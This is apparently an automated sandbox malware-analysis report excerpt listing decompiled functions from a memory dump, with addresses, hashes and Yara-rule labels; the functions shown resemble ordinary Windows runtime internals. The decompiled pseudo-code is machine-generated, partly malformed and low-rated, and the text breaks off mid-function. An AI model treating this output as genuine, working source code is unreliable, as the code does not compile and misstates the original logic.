                                                      0x01699299
                                                      0x0169929f
                                                      0x016992aa
                                                      0x016992ad
                                                      0x016992ae
                                                      0x016992af
                                                      0x016992b0
                                                      0x016992b4
                                                      0x016992bb
                                                      0x016992bb
                                                      0x016992c5

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: f54883fdb9cb226dae27c42bc5692f3e483dfcd00b35c223ef9ea0f425504c57
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: 26E02B323405016BEF119E09CC84F03375EDF92724F0040BCB9005E242CAE5DC0887A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728D34, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 43%
                                                      			E01728D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x174d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01677D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0169B640(E01699AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                      0x01728d34
                                                      0x01728d43
                                                      0x01728d4b
                                                      0x01728d4e
                                                      0x01728d52
                                                      0x01728d5c
                                                      0x01728d6e
                                                      0x01728d5e
                                                      0x01728d67
                                                      0x01728d67
                                                      0x01728d79
                                                      0x01728d7a
                                                      0x01728d7c
                                                      0x01728d81
                                                      0x01728d94

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8e453bbe850d9dbaea32f563f6fbfe062ae9636ed6428a31bd4e34a5b342e58
                                                      • Instruction ID: 7ae135e032eb9e64c02b81e310ed899ee80c5bd26ca17357edfad936d122b385
                                                      • Opcode Fuzzy Hash: b8e453bbe850d9dbaea32f563f6fbfe062ae9636ed6428a31bd4e34a5b342e58
                                                      • Instruction Fuzzy Hash: 4CF0B470A046189FDB14EFB8E845A6EB7B9EF18700F10809DE905EB280EA34D900C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728B58, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E01728B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x174d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01677D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0169B640(E01699AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x01728b67
                                                      0x01728b6f
                                                      0x01728b72
                                                      0x01728b7d
                                                      0x01728b8f
                                                      0x01728b7f
                                                      0x01728b88
                                                      0x01728b88
                                                      0x01728b9a
                                                      0x01728b9b
                                                      0x01728b9d
                                                      0x01728ba2
                                                      0x01728bb5

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d47caf69219b2128bbf4f41a9dfb0f7342e45169cba792f11056553539b5273
                                                      • Instruction ID: 2a592465241c78287756d6dfe287b37c50a0460db5227caf86e8e4d73418938c
                                                      • Opcode Fuzzy Hash: 4d47caf69219b2128bbf4f41a9dfb0f7342e45169cba792f11056553539b5273
                                                      • Instruction Fuzzy Hash: 32F082B1A04259ABDF10EBA8E906E7EB7B9EF14700F04049DFA05DB380EA34D900C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167746D, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E0167746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0166EB70(__ecx, 0x17479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E016995D0();
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                      0x0167746d
                                                      0x0167746d
                                                      0x0167746d
                                                      0x01677471
                                                      0x01677488
                                                      0x016bf92d
                                                      0x0167748e
                                                      0x01677491
                                                      0x01677495
                                                      0x016bf937
                                                      0x016bf93a
                                                      0x016bf94e
                                                      0x016bf953
                                                      0x016bf956
                                                      0x016bf956
                                                      0x01677495
                                                      0x00000000
                                                      0x01677488
                                                      0x01677473
                                                      0x01677478
                                                      0x0167747d
                                                      0x01677481
                                                      0x00000000
                                                      0x01677481
                                                      0x0167747d
                                                      0x0167747a
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0bf160f795ec087c9c4a7b5c7ca25263ae9c6cd6db3fa85bc721ed57911e0ac
                                                      • Instruction ID: 309f622bb36e88b6162d601faee26db9516f5400c60b3e9516528859c0db2f28
                                                      • Opcode Fuzzy Hash: b0bf160f795ec087c9c4a7b5c7ca25263ae9c6cd6db3fa85bc721ed57911e0ac
                                                      • Instruction Fuzzy Hash: 13F0E235902145ABDF12AB6CCC84BBABFB2AF14314F040259D891AB269E725D802CBC9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01728CD6, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E01728CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x174d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01677D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0169B640(E01699AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x01728ce5
                                                      0x01728ced
                                                      0x01728cf0
                                                      0x01728cfb
                                                      0x01728d0d
                                                      0x01728cfd
                                                      0x01728d06
                                                      0x01728d06
                                                      0x01728d18
                                                      0x01728d19
                                                      0x01728d1b
                                                      0x01728d20
                                                      0x01728d33

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e21a509e028d31b51107db9ca30e315c0433c5df570485c573f20e19a4d655d5
                                                      • Instruction ID: 604b4a0fd8e76b132680ada70c53d3551c99c6cc67b6710c026dd5a93b73c9ef
                                                      • Opcode Fuzzy Hash: e21a509e028d31b51107db9ca30e315c0433c5df570485c573f20e19a4d655d5
                                                      • Instruction Fuzzy Hash: D5F08271A04219ABDF14DBF8E945E6EB7B8EF18300F10019DE915EB280EA35E944C759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01654F2E, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01654F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E017288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0167C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1631030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                      0x01654f2e
                                                      0x01654f34
                                                      0x01654f38
                                                      0x016b0b85
                                                      0x016b0b85
                                                      0x016b0b89
                                                      0x016b0b9a
                                                      0x016b0b9a
                                                      0x016b0b9f
                                                      0x00000000
                                                      0x016b0b9f
                                                      0x016b0b94
                                                      0x016b0b98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b0b98
                                                      0x01654f3e
                                                      0x01654f48
                                                      0x00000000
                                                      0x01654f6e
                                                      0x00000000
                                                      0x01654f70

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1bfc227e4ef9fc7d48d34e23ea742dd801c63c96953a0c74ad8a080af7f288a
                                                      • Instruction ID: caa0ef102fece9a9e928f0492caeb3c9c827e6e5b3204a20e6d2b72c63172174
                                                      • Opcode Fuzzy Hash: e1bfc227e4ef9fc7d48d34e23ea742dd801c63c96953a0c74ad8a080af7f288a
                                                      • Instruction Fuzzy Hash: D5F0BE325257968FE772CB1CC9C4FA3BBE4AB10778F4444A4E40587A22DB25E8C0C740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168A44B, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0168A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1747b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0169FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                      0x0168a44b
                                                      0x0168a453
                                                      0x0168a472
                                                      0x0168a476
                                                      0x00000000
                                                      0x0168a493
                                                      0x0168a47a
                                                      0x0168a47f
                                                      0x0168a486
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08ee5d403673c8d48af4dc45548ad0c1554cd16d9ac162820d46c5d1968702b8
                                                      • Instruction ID: 61d09dc0b8b25f3e51e6fbab34c9de072db5fd5d4d64ae0d70065954accd0201
                                                      • Opcode Fuzzy Hash: 08ee5d403673c8d48af4dc45548ad0c1554cd16d9ac162820d46c5d1968702b8
                                                      • Instruction Fuzzy Hash: 0CE09B72A01421ABD7115A5CAD00F56775DDBE5651F094139F904C7214DA28DD01C7E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165F358, Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E0165F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0168F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01674620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                      0x0165f35d
                                                      0x0165f361
                                                      0x0165f367
                                                      0x0165f372
                                                      0x0165f38c
                                                      0x0165f38c
                                                      0x0165f394

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: dfd7ad2ae1bfbbfdcfda71b59f4786dddbac4bd7889a3ba90576c076d1b8fd1c
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: 8BE0DF32A42128FBEB61AAD99E05FAABFADDB58A60F0001D9FE04D7150D9609E00C2D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166FF60, Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0166FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E017288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01670050(_t14);
				}
			}










                                                      0x0166ff66
                                                      0x0166ff6b
                                                      0x00000000
                                                      0x0166ff8f
                                                      0x00000000
                                                      0x0166ff8f

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2856df71cdde85f1eb39f889f9a217d13cb8402970434f3c3b0f56e15ee92bd4
                                                      • Instruction ID: d80c24e2a903f4d0b6bb4a93e08e3abf5973460c7a66a51da86bb8da76868acd
                                                      • Opcode Fuzzy Hash: 2856df71cdde85f1eb39f889f9a217d13cb8402970434f3c3b0f56e15ee92bd4
                                                      • Instruction Fuzzy Hash: 3DE0DFB02052049FD736DF5DF860F257B9CAB62621F19809DE0084B202CF32D881C29A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E41E8, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E016E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x17308f0);
				_t5 = E016AD08C(__ebx, __edi, __esi);
				if( *0x17487ec == 0) {
					E0166EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x17487ec == 0) {
						 *0x17487f0 = 0x17487ec;
						 *0x17487ec = 0x17487ec;
						 *0x17487e8 = 0x17487e4;
						 *0x17487e4 = 0x17487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L016E4248();
				}
				return E016AD0D1(_t5);
			}





                                                      0x016e41e8
                                                      0x016e41ea
                                                      0x016e41ef
                                                      0x016e41fb
                                                      0x016e4206
                                                      0x016e420b
                                                      0x016e4216
                                                      0x016e421d
                                                      0x016e4222
                                                      0x016e422c
                                                      0x016e4231
                                                      0x016e4231
                                                      0x016e4236
                                                      0x016e423d
                                                      0x016e423d
                                                      0x016e4247

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64dd4627bf52e47b662fa54f03b25fcd6fd0ac0451528249ab7783b362e6c322
                                                      • Instruction ID: e17cd6f2a6b8b8a1a4296a11cf01a896c98fa81c2ae5f5bdc2cc78f05e968d62
                                                      • Opcode Fuzzy Hash: 64dd4627bf52e47b662fa54f03b25fcd6fd0ac0451528249ab7783b362e6c322
                                                      • Instruction Fuzzy Hash: B8F01C78891709CFCB72EFE999247287AE5F794361F40C12B910087688D7344451CF06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0170D380, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0170D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0165E8B0(__ecx, _a4, 0xfff);
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                      0x0170d38a
                                                      0x0170d39b
                                                      0x0170d3b1
                                                      0x00000000
                                                      0x0170d3b6
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: 5b4b27599eccd5723e048109fc5ae662a434f527685d0e1cdbfef0335ac08d3c
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: 5CE08C31280305EBDB225E84CC00B69FB5A9B507A1F104035FE085A690C6719D91DAC8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168A185, Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0168A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x17467e4 >= 0xa) {
					if(_t5 < 0x1746800 || _t5 >= 0x1746900) {
						return L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01670010(0x17467e0, _t5);
				}
			}





                                                      0x0168a190
                                                      0x0168a1a6
                                                      0x0168a1c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0168a192
                                                      0x0168a192
                                                      0x0168a19f
                                                      0x0168a19f

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0adbf1b97259e5d064dda88aff470c42d59b057b177d33cd0d121b04affd7a65
                                                      • Instruction ID: 65461630874a304a53e8824ceea2713af26ba8acfaaab3fff6c917465a77a1b1
                                                      • Opcode Fuzzy Hash: 0adbf1b97259e5d064dda88aff470c42d59b057b177d33cd0d121b04affd7a65
                                                      • Instruction Fuzzy Hash: 15D02B6116400057C72E7340CD14B257213F781B65F34451EF2434B990EB6488D5C10C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016816E0, Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01681710(0x17467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01674620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                      0x016816e8
                                                      0x016816ef
                                                      0x016816f3
                                                      0x016816fe
                                                      0x00000000
                                                      0x01681700
                                                      0x0168170d
                                                      0x0168170d
                                                      0x016816f2
                                                      0x016816f2
                                                      0x016816f2
                                                      0x016816f2

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3280ab7d4d95702a651843fea48d2a45ab1ce79344ab96d730c84ef3a655438b
                                                      • Instruction ID: a716e8736f9b46a43eb14e4ef6f21631f49829f9765de5dcf682c283bb6ffae3
                                                      • Opcode Fuzzy Hash: 3280ab7d4d95702a651843fea48d2a45ab1ce79344ab96d730c84ef3a655438b
                                                      • Instruction Fuzzy Hash: 1CD0A7311001019AEA2DBB149C14B143652EB91785F38016CF217499C0CFF0CCD3E04C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D53CA, Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016D53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0166EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                      0x016d53ca
                                                      0x016d53ce
                                                      0x016d53d9
                                                      0x016d53de
                                                      0x016d53e1
                                                      0x016d53e1
                                                      0x016d53e6
                                                      0x016d53f3
                                                      0x00000000
                                                      0x016d53f8
                                                      0x016d53fb

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction ID: f6150e44b1b3f472beabe3ad151b094d94282df2de64cfa265e95726839220af
                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction Fuzzy Hash: 1BE08C319006809BCF12DB48CA50F5EBBFAFB44B00F150008A1095BB20CB35AC00CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166AAB0, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0166AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                      0x0166aab6
                                                      0x0166aabb
                                                      0x016ba442
                                                      0x00000000
                                                      0x016ba448
                                                      0x016ba454
                                                      0x016ba454
                                                      0x0166aac1
                                                      0x0166aac1
                                                      0x0166aac6
                                                      0x0166aac6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction ID: c5cf277e2c090b001cab28e4f4ec9022299f6a6031652afbdea8d3c1e0f90788
                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction Fuzzy Hash: B7D0E935352980CFD627CB5DC994B5577A8BB44B44FC504A0E941CB762E72CD984CA10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016835A1, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016835A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0166EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                      0x016835a1
                                                      0x016835a1
                                                      0x016835a5
                                                      0x016835ab
                                                      0x016835ab
                                                      0x016835b5
                                                      0x00000000
                                                      0x016835c1
                                                      0x016835b7

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction ID: 7760ce8a97168675225fe7f2597a3980df19ebf3b7b97138ca893312f5234928
                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction Fuzzy Hash: C0D0A9314011819AEB02FB14CA187683BB2BB00A08F58266980020EB52C33ACA0AC726
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165DB40, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0165DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01674620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                      0x0165db4d
                                                      0x0165db54
                                                      0x0165db5f
                                                      0x0165db56
                                                      0x0165db56
                                                      0x0165db5c
                                                      0x0165db5c

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction ID: ce645511c12597656d56ef0c1ba9f6eeffa29aeced2591d99fc0833bb9b73318
                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction Fuzzy Hash: F6C08C70280A01EAEB226F20CD01B003AA2BB10B01F4400A06700DA0F0EF78D801E600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016DA537, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016DA537(intOrPtr _a4, intOrPtr _a8) {

				return L01678E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                      0x016da553

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: b0b561c9e926462316046c9696e6b0742112ea48fb6e18b7715f9157d3e41319
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: 3FC01232080248BBCB126F81CC00F067B2AEBA4B60F108414BA080B5608632E970EA88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01673A1C, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01673A1C(intOrPtr _a4) {
				void* _t5;

